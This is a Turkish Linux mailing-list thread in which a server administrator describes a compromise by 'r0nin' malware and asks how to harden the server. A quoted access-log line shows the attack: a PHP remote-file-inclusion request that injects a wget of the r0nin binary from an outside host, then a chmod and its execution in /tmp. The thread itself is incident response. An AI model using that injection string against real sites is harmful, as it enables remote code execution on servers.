From: The RED (jdred@gmx.net)
Date: Mon 18 Apr 2005 - 21:00:34 EEST
sanırım basit bir hata yapmışım. php safe mode kapalıymış :(
onu açıp aynı yolla r0nin'i yüklemeyi denedim bu sefer yüklenmedi.
inşallah /var/tmp dizinine giriş olayı da bunun sonucunda olmuştur ve
inşallah başka bir açık yoktur.
chkrootkit ve rkhunter ile tarattım bir sorun çıkmadı.
bu son gelişmeler ışığında sizce hala bu sunucudan hayır gelmez mi yoksa
problem giderilmişmidir?
umarım başka bri açık kalmamıştır, şu an bir şey görünmüyor bakalım..
----- Original Message -----
From: "The RED" <jdred@gmx.net>
To: <linux-sunucu@liste.linux.org.tr>
Sent: Monday, April 18, 2005 8:24 PM
Subject: Re: [Linux-sunucu] r0nin
> newpass'in dosyalarını ve çalışan işlemlerini silmiştim zaten. netstat ile
> baktığımda anormal birşey görünmüyor. Daha önceki mailimdeki r0nin'in
> nasıl
> bulaştığını tesbit ettim. Sunucudaki sitelerin birindeki php-nuke benzeri
> bri portal yazılımındaki bir php dosyası (resim galeri veya dosya upload
> ile
> ilgili herhalde) ile r0nin internetten /tmp dizinime indirilmiş ve
> çalıştırılmış. Sitenin domain loglarındaki ilgili satır aşağıda:
>
> ./******.com:377:85.97.31.* - - [17/Apr/2005:13:52:04 +0300] "GET
> /library/lib.php?root=http://members.lycos.co.uk/saudix/Cmd/newcmd.gif?&cmd=cd%20/tmp;wget%20http://www.fendora.net/asc/xpl/r0nin;chmod%20777%20r0nin;./r0nin
> HTTP/1.1" 200 8543 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR;
> rv:1.7.6) Gecko/20050321 Firefox/1.0.2"
>
> Bunu tesbit ettim ve sildim, ama benzer bir yazılımı sunucudaki herhangi
> bir
> kullanıcı bilinçli veya bilinçsiz olarak yükleyebilir. Bu şekilde sunucuya
> nası bu kadar kolayca dosya indirilip çalıştırılabilir anlamıyorum.
> Sunucudaki yazılımların tümü (cpanel, apache, php vs.) son sürüm, bugün
> cpanel içinden bazı ayarlamalar da yaptım (mod_userdir, php open_basedir
> korumaları), kernelim de öyle çok fazla eski değil.. (2.4.22)
> Bildiğim kadarıyla bu açık taaa geçen sene aralık ayında falan çıkmıştı
> (phpBB'de çıkmıştı ilk olarak diye hatırlıyorum) ve php 4.3.10'dan
> itibaren
> yamandı diye biliyorum. bende 4.3.11 yüklü..
> E peki yazılımlar da güncelse nasıl korunacağım ki ben bundan?? her önüne
> gelen bu php scripti ile dosya yükleyip çalıştıracak mı sunucuya??? Hatta
> o
> scripte de gerek yok, o scriptteki iki-üç satır kod yapıyor zaten bu
> şeyleri..
>
> Diğer konu ise hala açıklığa kavuşmadı. r0nin web üzerinden çalıştırılmış
> onu anladık. Ama /var/tmp dizinine nasıl bağlanarak shell komutları
> doğrudan
> çalıştırılabiliyor? Bunlar web üzerinden değil doğrudan shellden
> çalıştırılmış.
>
> Daha önce sormuştum henüz yanıt alamadım, /var/tmp dizinini noexec olarak
> mount edemedik başta, peki o dizinin yetkisini sadece root üzerine alsam,
> o
> zaman nobody ile çalışan bu dosyaları önleyebilir miyim??
>
> windows bile virüslerden çoğu zaman tamamen temizlenebiliyorken son sürüm
> yazılımlar kullanılmış bir linux sunucuya nasıl böyle şeyler
> bulaşabiliyor,
> hadi bulaştı diyelim, nasıl format atmadan temizlenemiyor? öneride bulunan
> çoğu kişi o sunucudan artık hayır gelmez, yeniden kur diyor. Birincisi bu
> bir webserver (hele ki cpanel kurulu, birsürü ayarları var vs.) o yüzden
> ayarları bozmadan yedekleyip yeniden aynı hale getirmek çok zor.. Kurdum
> diyelim, yine aynı sürüm apache, aynı sürüm php kullanacağım mecburen,
> yine
> aynı problemin olmayacağını nasıl bileceğim o zaman? Bu çok eski bir
> sunucu
> değil. 2 yıldır yayında olan daha eski bir sunucumda bile böyle birşey
> olmamıştı.
>
> Teşekkürler.
>
> ----- Original Message -----
> From: "Nihat Ciddi" <nakof@zig.gen.tr>
> To: <linux-sunucu@liste.linux.org.tr>
> Sent: Monday, April 18, 2005 7:03 PM
> Subject: Re: [Linux-sunucu] r0nin
>
>
> _______________________________________________
> Linux-sunucu mailing list
> Linux-sunucu@liste.linux.org.tr
> http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
>
>
--------------------------------------------------------------------------------
_______________________________________________
Linux-sunucu mailing list
Linux-sunucu@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
_______________________________________________
Linux-guvenlik mailing list
Linux-guvenlik@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-guvenlik
